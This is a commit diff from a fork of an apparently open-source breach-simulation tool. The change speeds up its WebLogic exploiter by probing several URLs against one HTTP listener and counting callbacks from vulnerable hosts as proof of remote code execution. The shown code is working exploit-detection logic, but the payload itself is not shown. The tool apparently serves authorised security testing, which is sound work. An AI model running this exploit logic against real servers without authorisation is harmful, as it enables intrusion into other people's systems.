forked from p15670423/monkey
Improved the speed of weblogic exploiter
This commit is contained in:
parent
c38793b527
commit
6073e9f677
|
@ -13,13 +13,16 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||||||
|
|
||||||
import threading
|
import threading
|
||||||
import logging
|
import logging
|
||||||
|
import time
|
||||||
|
|
||||||
__author__ = "VakarisZ"
|
__author__ = "VakarisZ"
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
# How long server waits for get request in seconds
|
# How long server waits for get request in seconds
|
||||||
SERVER_TIMEOUT = 4
|
SERVER_TIMEOUT = 4
|
||||||
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
|
# How long should be wait after each request in seconds
|
||||||
|
REQUEST_DELAY = 0.0001
|
||||||
|
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
|
||||||
REQUEST_TIMEOUT = 2
|
REQUEST_TIMEOUT = 2
|
||||||
# How long to wait for response in exploitation. In seconds
|
# How long to wait for response in exploitation. In seconds
|
||||||
EXECUTION_TIMEOUT = 15
|
EXECUTION_TIMEOUT = 15
|
||||||
|
@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
|
||||||
print(e)
|
print(e)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
def check_if_exploitable(self, url):
|
def add_vulnerable_urls(self, urls):
|
||||||
|
"""
|
||||||
|
Overrides parent method to use listener server
|
||||||
|
"""
|
||||||
# Server might get response faster than it starts listening to it, we need a lock
|
# Server might get response faster than it starts listening to it, we need a lock
|
||||||
httpd, lock = self._start_http_server()
|
httpd, lock = self._start_http_server()
|
||||||
|
exploitable = False
|
||||||
|
|
||||||
|
for url in urls:
|
||||||
|
if self.check_if_exploitable(url, httpd):
|
||||||
|
exploitable = True
|
||||||
|
break
|
||||||
|
|
||||||
|
if not exploitable and httpd.get_requests < 1:
|
||||||
|
# Wait for responses
|
||||||
|
time.sleep(REQUEST_TIMEOUT)
|
||||||
|
|
||||||
|
if httpd.get_requests > 0:
|
||||||
|
# Add all urls because we don't know which one is vulnerable
|
||||||
|
self.vulnerable_urls.extend(urls)
|
||||||
|
self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
|
||||||
|
else:
|
||||||
|
LOG.info("No vulnerable urls found, skipping.")
|
||||||
|
|
||||||
|
self._stop_http_server(httpd, lock)
|
||||||
|
|
||||||
|
def check_if_exploitable(self, url, httpd):
|
||||||
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
|
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
|
||||||
try:
|
try:
|
||||||
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
|
post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
|
||||||
except exceptions.ReadTimeout:
|
except exceptions.ReadTimeout:
|
||||||
# Our request does not get response thus we get ReadTimeout error
|
# Our request will not get response thus we get ReadTimeout error
|
||||||
pass
|
pass
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
LOG.error("Something went wrong: %s" % e)
|
LOG.error("Something went wrong: %s" % e)
|
||||||
self._stop_http_server(httpd, lock)
|
|
||||||
return httpd.get_requests > 0
|
return httpd.get_requests > 0
|
||||||
|
|
||||||
def _start_http_server(self):
|
def _start_http_server(self):
|
||||||
|
|
Loading…
Reference in New Issue